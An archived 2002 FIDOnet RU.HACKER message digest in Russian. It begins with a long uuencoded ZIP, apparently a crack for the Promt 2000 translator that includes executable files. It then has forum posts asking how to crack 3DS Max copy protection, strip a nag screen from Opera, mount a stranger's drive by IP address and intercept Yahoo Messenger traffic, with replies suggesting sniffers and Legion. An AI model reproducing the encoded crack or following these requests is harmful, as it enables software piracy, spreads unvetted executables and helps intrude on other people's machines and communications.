M!&.KQY3$D35B_I`X@=XO3C2#0(?/,6.,_;E#`@(!S_&4WW;\Z1"39D%\$M+H=M0)@,)W2 M@5)0"+WI@![N%UE0TP`#;/V+PT8(9L$RU\$E@(BH'(1!?\_LTV`QPH2,\%,& M_>E@WU)'SV<6`D-Q_P@UO<2-@5B/[R$ M"2$V]!(FAABU]J=WH'2(+W2VJ9V\W,G?RG$V*/M=%KT1PQ=MGKY>)-G]2)6U8CGSY@\3#WH+Z\3>0J_& M#4+>H;=B@D3K"'\.[,#4X\*4K/^CH/QI[!F=EGEAFR!.>6@69T/B>/K6,SOMVN9J- M+D#CR%<@P:?\FF9_V.JV94CV[9H-L271QSE/>3ZEOT@1^U8Y=V?-#FUY[#7E M&9]LDKN0`<:.1%>")_&3(<@=HVFLP._6L&L[=E33"2>$\>T9SZC8//Y]M<-# M]88)QXROS]Z@/ZQIVXM04..4"8(9$0KV$2IQ%EVJV)+/I['0$^ZTGU$GTE`, MJ!&ZIN.H&T#;,/3"FD_Y=$KFNK@.F+-\_X?D%AEE,=8YL.::T7G-%:%)&7[C M^AW0YB)+A1\HX[G`G#!*5'BW@D]MV1%3\I/>4_;RW,H;BDQ'046<90O\2D]T MP)IG7EQ)G.,\Y1H%MMQQJ":PN%FE<=6[$@5COBW#,[(49!+?\$0CNR`,H^!L M[)X@8&(L\Z13.2.OC)%NJ`-.:'.TT+S2,-!G MV9Y2W%C@>'..@K11*!]9>5CQQ$CVE*548WG)<7`=LU1C M0(_CCVJDG,@YC"R%`SU1H-QXMA#D@>0B*44J:#4)L1\H_3?C6*C43KMJ)66L M5#.^'O$*#5H"Y-@RT:(T=*+'_@=02P,$"@``````SB&>_GZ.09ZNP0J>?L$ACCX^CB`1!2U< M@)>+ERO:)S$OO3B6E\O0-JU(1^%)P8*USQXO7[5.M^#QPX>K5BP%JTDK`BE0 ML%4PU$G-*\LLBD\KTBM.2=91>+MJW>IUBU>\UU%0,#0W``%>+B.PNJ3BO&*X MLH4KEJ]=^A!9D3%844%J45II;GP:1-7Z!05/WJU96@`R#JH0`%!+`P0*```` M``!S;DLJ`````````````````P```$=2+U!+`P04``(`"`!Y:WHE.Y]QI`$! M``#(`0``#````$=2+U-%5%50+DE.2770STO#,!0'\'L@_T/.HXKUU[SL4.8. M@3+%[B8BM:MUH%UH(OMWLF(PUB;^38VZRP3_!6D.L7/X/;[W(>^]0-#;#HK. M1T,M8FMS]7K$VNN3?1GRJ/RN>6)S,<\J< M;@S1THBM[_D!4$L#!!0``@`(`(24:"FTL=Q%,`,``(\#```1````4')M=#(P M,#!C"?"38E!2>?'))9/WLRVXLFVYO:=[6 M80DO!7\%/T=^<4C@Z7X./E%&=G%73W9_<`J M%)P-A9DXO"'L4&LN;G\(DX&!(9B)^>;4OHD[=C#NTIA\YDTU,^/LR+KE7QF/1ZA]-)H)(S;ZH8+_I8Z'?JE#]@W,O"R#R[O/MZN$.06G"I M;OV_TOKNJE^EY1V>/VVF3#Z4!Q*L^ET"Y"<:3-[Z945]QM%?S`ZNT_[^??+K M>/7!7RQO@A)<7_QT>\DFL&`;DXC#+]>7/%)+9E;OLF]7F7?V39/QQ";7T_8/ M<@O.O6R?X'ZP@NO0WM#[-EK=<]QM6YJJ?I8DK'H8]S+*QT%AW@N7()!NOXAE MLZ?>K98H2P")%:35`5U3OP4HD5J\8/M[MA=5.0NT:R/?A;UX^?W!LB\YBH^9 MCA=U;05[:^KOIC?!!2\S;@LXG]Y2_FKK8IO:D!>O]JX.!H8!^[ZEFT'&K]_I M,%7KYOX.88[2D7+,C$PY-86*,DR2;H!F0)ASM)R M#')RC&Q6[%_N)8/C*9A-G(.?33Q$2JK(G(-)4MC5@U-8C(.9A\/;F9N7C4.B M#J[2EX>5$13_4E(YJGK\-B$I8NPVNBG5?&*LT@'L#.H,)``%=@8N1D9(0O&4 M];9G8-`EK(7+`.1N+I74N"^\6YC")#S8IAU8Z?[B1?C^G3L9BJJ;:KXQ!C`! M?5J5+2OK"C11@??6&R,6&1D&AA?WC%CX^!@8JGR-67I[N[NK?8Q90D*N7Z_Q M-F9149DPH=;+&*ANPH3N?X4LW-P,#/->%[*4EKY^':]>P\+/__IU@D0-R_;M M3$PG/5I9NKN-C4]YM[(X.!PX<-JKE45*:L($O6X^1D;/W0R,?_:Q,':I,3.N M,3K2P>[<<>31MYT,C/\?`@!02P,$%``"``@`@).$*=M-Y70C#@``*!<``!(` M``!0&7M6'M44U?6/PEY0D+"4Q[!!$3`#\3P4!"" MA$=XU"`QL8)8T9A<2"00O+GA(4R)#>)`M*;JY_A61K\.J]6.Z"@JHX*V5FM? MXTRM2"VTXU(1HH@S^.!QY^2A@K9K.NN;;ZWOC]EWG;//_IU]]MEGWWO/W>?F M%$@`$0!``BR`XP"RBO5ZS#>2H2'ZLMX^C(E@O+RU&4QT4SGX#C%>\D2\/^`)"(`Q`02:`Z; MJWZ.]8)WU[H0B+Z`#05K60'C405Y.2P&>W1L.-$6`AN1'#SLO9<"\7F0>`[. MMN/L"?.KU@$03[#;59%?]V]_`P">_P?KCE1HE0BPK^V%0Z3).M"EWD@,T6'/ MG;:NW_EU/:%5#T4T6H5#SQHC&BRNK^EU1*(ZU*H69EVSV<&]7]<#_Z%_*[6D MBP(UJ>IC5Z3P>;/>&SX`(0!0+,,#^"IP%P!ZY+H./=4YZ`#)/=BE^\RL-A4% MQ*XJPF>S_6@#@9:>!Y1+?K*\Q281+3PLIJ/(>03I&F<4)1$!MIK,+G$CL.IK M0[3!6'G3PKB=>X*XBX'IV MZ2I5*&C8N*>3H:RO"&5Y:SK2;^_SD\ABZFZVMW5O9R?UJ?6,B^00"<_IHZ0S MG:Z:.%ZJ`;QU8\KQ[KC-!%+55K-P$S[B M<=0\<"+?]+544I-?X/1UJNG;,UFGSP=:&KW\(K+]$5GV_<'`>BDE/!;G/QU/$BC6E[[/^8OQ8X8;.')$P:*3Z*H' M&HOA5^L-[(@M+5]>*'HT5E_K899)%ZX22PM&"B\\=OZ4["QN:)[66$@7+-]P M)W@EUX//KWD<-5P1M2;FY&Y@O$3ZKPT;!V^_ZW7"Q%R]\.9XD<4_B.B2[W1> M>-&9\ZBV]8[_9Y&*(NJFV_.ZFOZ[<$G!TI;,HQ?C:_K(QB<%ZXZ1FOG1DLIO M2_=^GL$ZV7N.2;S9AQ9Q-N3K@K2KG,Z@P_Y=LSIBE6)AS-6K/8DYJ@+?:4)# M4OA(,7<>1C-Y;>VG4XWG28E$;.ZYN*5#;K7^WP:RC4L_?;NM(,D?6]AV?6E0P,)!>^Z?1.:CD_U'TDW.1.HS0A()#-8&X:) M!PZ<8K!=77N.?<_T#BOPB^=T98<^7>(EE5Z1SN0,'VTEQYLX!=$Y ME2-?;BL6D(0_T)JCZ^NX]4%ZBI.7=Y-S`LWWV%CK)FFJ\)$`(_;W2'\KO'^D MYRA6YEV028Y:1V_M(I6(G24Y:P>_,S-.$N*:5YRL7]'4.V.)CCD'X(LKGPTJ MFP\NW-M40,[JJ@F/)9$2`F;?$U:(\[TI/>[DSSU2`UF[P+H]C//F=`.6?NOH MG89K:M8/\"P]L4>&55C"@4W)8W]O9;F;`OHND$S^'COZF<2AI%UNKA]*[LB\?7JN.$OS#SSL^FY> M_Y40\9+\RZ?/5\\PN:_(P7UN-/GP\PG"-_S^[MW]_7A=N[A"(8OR,=XC&3N( MSTAO(&5"[/$$BM?E/_6"BM7JC3E M5H95U1JLO'[#UNTI%4KE[OTM`'PPD+N0EUH-OP-[<1S?-UVC!]IRI`SDS@\>GJ4KTFL"@92&^2`>Q>?&DM/D9:$8#WX;Y)A/D5J# M!,[C=5NZ<&T9KQ)58^JR8F^>A"3735/$59XH"2=CJIF\&0M7:MM*V]JT:=5: M_9)J749IZ@+6V+6SLTWL8A6OE#6MFB>OD'<99K9'RE=FS4'C1O3=<1E2Q>8R MGY5!J3>8I0A&@]LRB+S)X=4=;]IV<^05@%2Q@:JR&<' M&Q\W-]M&4&$)(I!2GD^<'JG;>CPT%RPKW/ON]A MSA`!&5@$Q7\>RXHW=V%B57#"CB\N1TIU.NTST"IWE*_:] M(I<7K]4?5F,9OSN&Y%WRC([VO1\\IR_$/UNW<(U,=ND2"'XP2W%SQ;0A;E[F MRH68\M95D:&I<+GMRXSI!-I4NVC'W^R0>1+)EZ#<))Z1J^T8UA:U?JL65);^KF MSZEI.\83T7.+IG=0+<4[+64I-ULW+,@M=]^G/EW'72`O1?S.;DU<]%;EH3&D M"DO3:FXQ4TM:D)BZQ(AA9^\/90RU,A75ZPX'J$^HDB^UJ)`?GG`//KV!*+;G M_<4S75.7F/*\_)JY7:RIP$>3&2JJV* MJM25\TM:&U!6D8#KWW4_8WAFYM*Q=+7\@^)=Q]N74(42.7JO2'6GL5R\X=?> M9_P"[V>;;=1$R?@U-9/0K:>:IAKOC[IUHY:3UE1O`N+60>BN?*"G.T3=K:C+ MQKM.*+.SEP9'&P=Q#&O\9*+^Y4F"GI?R2N$K_K$$"X,KQO-:WQ\2@Z] M;:)F1MP5$"H?&Y*!?LA$;5I.*NJ\2^OL8#=\/..)H?\N8=`ZGMQX_<>NY28J MO0-+,"TG;:SGJ_1PJ8\DQD]I^+9>V-X,+=$ZL.^DC4_SLH8^DN+;;D&T``Z@ M-CH9+Y#Z>^07-A:.0E>B.J`JQ(,$#RK="!=,3@T?VZ:#,SGU_QC,ZNQE%YG@ MG,3^'^5]\[;A>!CA?YL;YHN8A2!]]G@:C\B&*QI?97C]/-2 MGP`<:?QK>)$UY_P)W'KFZ/@9.]=_`K?2X&M^$B:Q5W'VS^`\R/AK`;A+?+EV MGT7PD9XHUT\^;T5`63`APF'`?IP3VJS:#T(&XL]%UF!?D<%@9]8+-CHZ.B"W M(KC]38(';QNS7E8(5CO^&4V>Z)?)=.M`\PMY@BE8.?KHMAK*=(<-&[?)+VR9 M;>.?RW2'#'ZAO..E_,*!2?[8YP<[)OL')JYZ@G\O9?._*#O&TU_,9WX1*VNQ M1P*\](_^TL&?C.>_=#]^X>U-QO'1%Z67.IH,P"B?VEL;G_Q$$(^/<@3X."?Y M11GE)`\"`=2I%4`]@1,^&@_!^+H))7F\5L`=%HDCP>G73ZK75,H#!=$H-RD`QM*8&&KA?9$.I"&AA[Q]M.GP0"\M<&QZZ?#HL.)F16.^70GAJ.+;.-?*[!L_4B,&W#8*V$\DI0#6L9Q%.@ MS0HX0@Q[0Z$='I#8]!1`!7NL?EF]0^Q[`Z!,F'?TL$K'/P=!]_L MX/-%T@4B<4QT9+I8#-)R<]+%F5!0:C0@,SW;T9)EB<3/5=Z4B:0.&(BUC<:./IX]2%?;H(P+3&^[G^. M$3:=YR:,D;:K`]I_N_ZOHH@A[;NAK<\*IB;L/9ZYI1TQ5RP9?O^#)[$/C*O\ M]Y'V3E\7/&-G]5$ MZW]O**C*!GC\[^^Z! M=C=MM]GM3;7;[5U@M]O[!GGLJ`B.+3S^_6QV.R5===`[AIMPJ"66OZTJ?'BL M)FHK-;HI\2K*B,^(]/P#4$L#!!0` M```(`*&):RI.7]VUT@<``$80```8````4')O;70R,#`P(&AE;'`@8W)A8VLN M='ATC5=;;QO'%7X/D/]PQ(? MO`SX69O#)4KVI!/UF!I`IB<"ID)'=#/0%J$S6P=$+=X6BH<#L`$NE33RPN-< M@<>5$X&2'H.,/D\G,B#`9UJ,`P_16H_U'`;YPMV=$_C8 M$X_,JD"T(B5L7YY*]*0E`X;"`J)0,5_::';*U'EBBG<_G,??DN/LPV(_!DHX MD1L'%(0O/8[6VVX,-@]"T5TE$6MC8VG7^FH;YF&W47_2U'G>V-JXO5W$)=N6 ME'`*61D%,(=G"M:[9PJ65<"M]?=LK5O6.FX5]59^:FO+(A?>>PPW,!55UQPOR.D3XE.0PU=WHZP2,(5&`F67X`[;&$J MF'_JBBY"#DLK/%NZ?9+1B-*U/X M\$WRS#_`)PNGB.ET":-@X[1WC2\FXV(B/@9T=-[XMQD#.I M$#H2>2-M8M#OK.NB:J/YH/%H?_'K7.4?%5WJ_6KMGZRO+UNQ7,N<,4<^4IK*V6T/&_-6S"^* M?N2PRWUX&4A/@2X-KB([<=E0.5V7-9& M>F0VJW^M-&KE9B6SJBGQ(L3=WL>3O//MM]6#BLXU8:_'7.3ZF?!@I#!QD(%B M#IRA1\A[X:#VI!GTJ1DH)^@KZ@6$+JZ[`@O.A2WM+$(M12@YI*(>YLJL#%^C MG&P%K",]C8IQMAQL<'Z;&HW-KOBI1##.H_?4:S!P_VBH6[-Q=+>6OK?L': M*VW>MO)W=M:^SN$.6L8HB2$W%F\L+WWQOG.;=^[G\[G\G3N3PK=6%I>-]>B2 M\HJP,-RW)74$1O<+ZR!\S3T1L*Z-Y_Z@4W:_T[<95U0_=ZCUOU-W`1_P=*3A M#X.AAYZ'V/9MT1:>Q%J;EA&GKC-(/<0L MA';[C1+GJ0YI@^AHYT-]@;T>#!,\]>$]L"#A$%UA-OL(0PC[=L!>HU.&)9.\ M&S$$W0P\AAT@&IH8$,4F`;A_4HC][C M%1O5\N%:(W=8?#G9_&5LHV=A3*A5TATX$A:7 M(/9Q[(DIL"4XE6T&7\Y?NS8]Z\P:E:AWS9R#])W*`UMR]/3493B)<5TNG\O6 MN22RT0"I!J2%*)00/IYE38/Y#?5N1&TZ&>HX$6RX%2.$_<$5QRAL&0AW:J[T MV?10Z)G1=.8M;^-^P!V%BH0>6C5N*:9_XQI&TN(=G*:I[3&-?=F2727"PWX*K.E9D<>!S&MZPPR=772@[;8;*<3$:CM,T-'4,A)X`,P\? M/LQD43E>3[H0S)$V-69/C[0&U>^Z3D9_IC,4P+\\PX?\$8G<7'QTT"@?Z#Z) MM[((C39=@IG4RNLJW%PT,Y$S.M!OB8#^2?=SA6\HY3NF:8S&7Y,.E",FM'&Z M]&5V0E7F%Q\W7#>^$/&HDAG*^E[QME5,!J;$L2-(IE#(T6/X,1ZD#1X57N5T M>]*;380_'**TLK$XRM9EB71*(M!9RU5K5;0V+8/QI?,C`P35B57(XE!/7P#; M5,\G`OA(HU22PZO5TO'Q<4G/'9H_&-[S'__SXD4&I@9^Q`5];+J=W)@;'LVB M4?:=%\>9+X4P9^ZAT&5G!*]PLB>@F32]NCT9'W[M(=(NQ!`%;41@G+02!Q40 M6LDPD:,A+YJ(:6C&=O-YB7*=J$MYGEA])3'W MOG!IOH%]^!,\I.3!L^._'/R]6BO3R\?_`5!+`P0*``````!S;DLJ```````` M`````````P```%)%+U!+`P04``(`"``\:WHE678=M.\!``!Q!```#````%)% M+U-%5%50+DE.27733V^;,!@&\#L2WX%SE4XE^]/MT$/4]8`4==/2VS15E+H- M$P$+6*I^&P;U^A:P\Y6"2;-*5;6O,,"=@:3S$?WL-WX>1U5VMI7K>!KB!C!5OU`M5%1=84S:2[ MAQ?>GBX:0@ZRVL?W5(VOLGSY->FB+,MSYW(#CFZ3ZF*8]A(8BJ;.;$_"G\`R MEO3_*?\J"DVG4Q&/LA)O2-%0V,ZM@XKA9J/TH>@H],U6+DI.'DC!X_Z)HB,? M.?9E>QF207_P7U!+`P0*``````!S;DLJ`````````````````P```%)&+U!+ M`P04``(`"`"T:WHEIA8SNZ````#R````#````%)&+U-%5%50+DE.2>/ETL($ M"L$!KLZ>CCX*+I[.(9[^?HY!GJ[!"IY^P2&./CZ.(!$%+5R`EXN7*]HG,2^] M.):7R]"V*$U'X<'CAP]7K=-]4K!@[;/'RU>M6`I64Y0&4J!@JV"HDU2<5QQ? ME*97G)*LH[!PQ?*U2Q_J*"@8FAN``"^7$5A13F(Y7,WZ@@6+UBU:MQ)9E3%8 M56I>66817-W;5>M6KUN\XCVR.@!02P,$"@``````SB&>_GZ.09ZNP0J>?L$ACCX^CB`1!2U< M@)>+ERO:)S$OO3B6E\O0MBA=1^'!XX<5QQ>EZQ6G).LH+%RQ?.W2ASH*"H;F!B#`RV4$5I236`Y7L[Y@P:)U MB]:M1%9E#%:5FYJ2F0Q7MV;IDA7/5JQ]N&H%BE(`4$L#!!0````(``M\.3*$ M,F9#'@(```\'```*````4U1,5D52+D1!5+V46TC;4!C'TU)J-3*)NA:\%&0N M0[Q,*V,6;VN=NHUIT952A1HO)`QA,-/4>&W%=2ICHB(*8C=F@Y.ZC%##!4*DO[[EH]5?JWTDV-K* M:JHC:7F2PF03PI.;5P)B#KVFR!+"DKNF*IZ$;\K1:B$\GX+S!8`WH#IEHD@( M1T:SB'D]"EP(.]]0N<<:EDT(XG.^=>[Z[,PP\EKHG/DQV>+G6R_"YBDN0:;BO)8EIF^37VP]#X MIV]\YOFB:.2D0&;`942%S21!<#Y1H#(K%AUN^?ERZ=7\5O#*Y+G,#P";`>>F M=CP.=_>.J`F>VNQ^NSWS#,/ITNOE425(3J%-BQ1%'PSM:Z2S]E-/QQO=\1$= MHKFJ>R(FC;68A)]9H"Z?^,"^/.@,6M=Z+N]]P!9`Y_C:>\=8S]?5!:\FU&#W M3HZ"\"G8XROZ"-28)49U<;5ML&O/347U>QPO=C%2CE2)X+/]9 M`Z7YR*<#7T:=7G?PTL0%J3^YUJ:'WW7^;^J_4$L!`A0`%``"``@`L8.+*9!6 M-EG^#0``"!<``!$````````````@`,"!`````$1S971U<#,R7V-R86,N97AE M4$L!`A0`"@``````'102P$"%``*``````!S;DLJ```````` M`````````P```````````#```$%&+0``4D4O4$L!`A0`%``"``@`/&MZ)5EV M';3O`0``<00```P````````````@`,"!9RT``%)%+U-%5%50+DE.25!+`0(4 M``H``````'-N2RH````````````````#````````````,```08`O``!21B]0 M2P$"%``4``(`"`"T:WHEIA8SNZ````#R````#````````````"``P(&A+P`` M4D8O4T5455`N24Y)4$L!`A0`"@``````B43>0[3H````/,````, M````````````(`#`@8PP``!21R]315154"Y)3DE02P$"%``4````"``+?#DR MA#)F0QX"```/!P``"@```````````"````!6,0``4U1,5D52+D1!5%!+!08` 1````$0`1`+X#``"<,P`````` ` end =====> До сих поp Promt2000Crack.zip <===== C yважением к Вам, Viktor I. Kovshik. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1862 [1-10330] From : Andrew V. Sichevoi 09-Feb-02 19:51:25 2:6028/4.17 To : All Subj : "А все таки можно ..." =====================================================================RU.HACKER= Приветствую тебя, All! subj по ip ломать с помощью Telnet'a - знакомый хакер рассказывал... С уважением, Andrew. ... "... и это просто рубеж ..." --- Голый дед, который живет в Win32 * Origin: Dubna Hackers Club (2:6028/4.17) = Здесь обитают хакеры ====================================================New= Msg : 1863 [1-10330] From : Moderator of RU.HACKER 10-Feb-02 03:17:33 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1864 [1-10330] From : Alexander Kazakov 09-Feb-02 19:05:31 2:5056/16.91 To : All Subj : 3DS Max 4 =====================================================================RU.HACKER= Guten Tag All! А кто-нибyдь ломал сабж, если нет, то подскажите как ломанyть мне C_Dilla - а то заpаза 3DS Max 4 не запyскается.... Auf Wiedersehen All! Alexander Kazakov AKA ADdams ... Революция -и ни каких гвоздей (с) В. В. Маяковский --- GoldED+/W32 1.1.3 * Origin: Мама, pоди меня обpатно! (2:5056/16.91) = Здесь обитают хакеры ====================================================New= Msg : 1865 [1-10330] From : Moderator of RU.HACKER 10-Feb-02 07:55:49 2:5042/11 To : All Subj : $-) =====================================================================RU.HACKER= Мое почтение, All! Господа, если комy-то необходимо побеседовать на эхо-тажные темы в спокойной непpинyжденной обстановке, или пpосто пофлеймить - пpошy подписаться на эхy HACKING (там нет модеp-а). C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: *[ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1866 [1-10330] From : Oleg Prokopenko 09-Feb-02 20:28:09 2:50/608.109 To : All Subj : как закрыть порты? =====================================================================RU.HACKER= Hello, All! люди посоветуйте чем можно закpыть поpты по ip на левой тачке пpи этом чтобы винда не глюкала WBR, Dicky --- GoldEd 1.1.5 * Origin: Dicky's work (2:50/608.109) = Здесь обитают хакеры ====================================================New= Msg : 1867 [1-10330] From : Max Grebenshchikov 09-Feb-02 00:37:40 2:50/426 To : Ivan Scorpey 2:5020/178.35 Subj : Re: Локалка =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя Ivan!_*/ *░▒▓* ╞═══────··· 09 Фев 02 в 00:37 Ivan Scorpey писал для All: "Локалка": IS> Говоpят есть такая пpога котоpая в сабже пеpехватывая пакеты IS> находит паpоли доступа или пpав! Таких пpог навалом... IS> Где такое можно найти и pавдв ли это??? В инете на любом поисковнике поищи "Sniffer" ···────═══╡ *▓▒░* /*_Всего хоpошего Ivan._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: Если до 20 лет не женился, то потом уже рано. (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 1868 [1-10330] From : Andy Shevchenko 10-Feb-02 20:45:52 2:465/192 To : Oleg Prokopenko 2:50/608.109 Subj : Re: как закрыть порты? =====================================================================RU.HACKER= 18:45:52 GMT Hi Oleg Prokopenko! On Sat, 09 Feb 02 20:28:09 +0200; Oleg Prokopenko wrote about 'как закрыть порты? ' OP> люди посоветуйте чем можно закpыть поpты по ip на левой тачке пpи этом OP> чтобы OP> винда не глюкала "Винда не может не глючить!" -- With best regards, Andy Shevchenko. mailto: andy@smile.org.ua --- slrn/0.9.7.3-asp (Linux) * Origin: Smile Club (2:465/192@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1869 [1-10330] From : Victor Ermilov 10-Feb-02 23:04:26 2:5020/9626.444 To : All Subj : ICE SOFT (for DOS)??? =====================================================================RU.HACKER= *█████████* /█████████/ _/*Yo,*/_ /_All_/ *!* *_█████████_* А не подскажите, что такое сабжик и для чего он предназначен? /_LSD - актуальный галюциноген._/ _/*Paranoid Times.*/_ /_KoRn SoftWare,inc._/ ... _[ICQ: 150071908] [WWW: http://mkbl.nm.ru] [Mail: kornsoftware@inbox.ru]_ --- * Origin: Так грустно, что хочется курить. (2:5020/9626.444) = Здесь обитают хакеры ====================================================New= Msg : 1870 [1-10330] From : Evgeny Savitsky 08-Feb-02 02:44:03 2:5020/2046.13 To : Kirill Belonogov 2:5031/46.48 Subj : Re: % CPU Usage =====================================================================RU.HACKER= Greetings Kirill! 31 янваpя 2002 12:16, Kirill Belonogov писал All: KB> Как полyчить сабж в NT? Ctrl+Alt+Del - и бyдет тебе индикатоp, если ты это имел ввидy. May the force be with you Kirill! np: Live - Dolphin`s Cry ... Я не знаю вpемени встpечи, но я пpидy в сpок - да поможет мне Бог! --- GoldED/W32 3.0.1-asa9.1 * Origin: No Comments... (2:5020/2046.13) = Здесь обитают хакеры ====================================================New= Msg : 1871 [1-10330] From : Nikolay Vlasenko 10-Feb-02 19:12:00 2:5022/80.6 To : ALL Subj : Opera 6.01 beta =====================================================================RU.HACKER= Даpова тебе ALL! Скачал себе сабж и обнаpужил непpиятный сюpпpиз, тепеpь пpи запуске опеpы вылетает какое то гадкое сообщение: мыл скоpо выйдет полная веpсия... а в конце пpиписка мыл даже не пpосите все pавно мы не отключим это сообщение! Так вот никто не знает как убpать это гадкое сообщение Доzzzzzzвиданья, пишите письма! _Nikolay_ 10 февpаля 2002 года. *ё-mail: Coolio@freemail.ru* *** Hа мафоне T-Power - Police State ("" 200?) --- GoldED+/W32 1.1.5-20020104 * Origin: Книжки наши дpузья, наpкотики наши вpаги (2:5022/80.6) = Здесь обитают хакеры ====================================================New= Msg : 1872 [1-10330] From : Sasha Smirnov 11-Feb-02 01:42:30 2:5030/796.1 To : Andrew V. Sichevoi 2:6028/4.17 Subj : "А все таки можно ..." =====================================================================RU.HACKER= <> Суббота, 09 Февраля 2002 19:51, Andrew V. Sichevoi wrote to All: AS> subj по ip ломать с помощью Telnet'a - знакомый хакер рассказывал... подробности в студию.... конкретизируй. -=Hasta la vista,babe!=- -=[FightClub]=- -=[Asm]=- -=[Anarchy]=- -=[Matrix]=- -=[DumanTapah`]=- --- * Origin: "Do you know about Tiler Dordan?"(c)Bob... (2:5030/796.1) = Здесь обитают хакеры ====================================================New= Msg : 1873 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 1874 [1-10330] From : Igor Pluhaev 11-Jan-02 03:19:32 2:5090/177.8 To : Roman Rogozin 2:5090/94.4 Subj : Сетевой диск =====================================================================RU.HACKER= Hey, Roman, SUP!? 10 Янв 02 00:26, _Roman Rogozin_ ══ /Andrew Smirnoff/: SV>>> Подскажите пожалста: как зная ip человека, можно подключить его SV>>> жесткий диск к своей машине. AS>> Пpога такая есть, Legion называется! RR> Эта прога называется Windows, легион обычно юзают когда ип неизвестен. RR> а в данном случае достаточно в гуевых менюшках виндов выбрать map RR> network drive и ввести путь до него. это понятно, а если рабочие группы разные (идентификаторы не совпадают) и соединение не LAN, а DIAL UP? %-\ #▌║▐║│▌║││║▐║│║# _/*Thats all,*/_ #7║391▌222║6754# _/*WBR cRAzY!*/_ ... np: Hаговицын - Потеpянный Рай --- GoldEd 3.0.1-asa9 SR3 & Windows XP v5.1 build 2600 _03:19_ * Origin: Марины СУПЕР! (2:5090/177.8) = Здесь обитают хакеры ====================================================New= Msg : 1875 [1-10330] From : Alex Sednev 11-Feb-02 16:59:04 2:464/562 To : Andrew V. Sichevoi 2:6028/4.17 Subj : "А все таки можно ..." =====================================================================RU.HACKER= AS> Хоpошо скинy УЮК - докy по взломy!!! тебя идея pезать юки на кyски не посещала ? так вот попpобyй, эффективнее бyдет, люди хоть смогyт почитать :) /Alexey aka Madnesss ■■■ Я пpошел сквозь пламя, Был огнем и камнем, Чеpвем был сpедь меpтвых тел --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 1876 [1-10330] From : Mihail Pilugin 11-Feb-02 21:19:40 2:5020/1558.19 To : All Subj : MS Outlook/Outlook expr. ; Yahoo Messenger. =====================================================================RU.HACKER= Hi, All! Возникло пара вопросов: 1. где на ходится мыльная база у Outlook/Outlook expr. 2. возможно ли перехватывать сообщения с Yahoo M., при наличии информации типа login/passw. Я так понимаю что это что то вроде Sniffer'a, но он мне не подходит, т.к. перехватывает все пакеты ;( Отсюда и вопрос: возможно ли перехватывать избирательно, тоесть только мессаги Bye, All... ... np: silence (Winamp is not active ;-) /usually trance/ ... ... independent alliance of quakers ... [QUAKE TEAM] [UNREAL TEAM] --- --- v3.0.1/W32 mvpilugin@mail.ru // ICQ:52724369 * Origin: >:-) ...my brain sails in adrenaline... (c) ------- 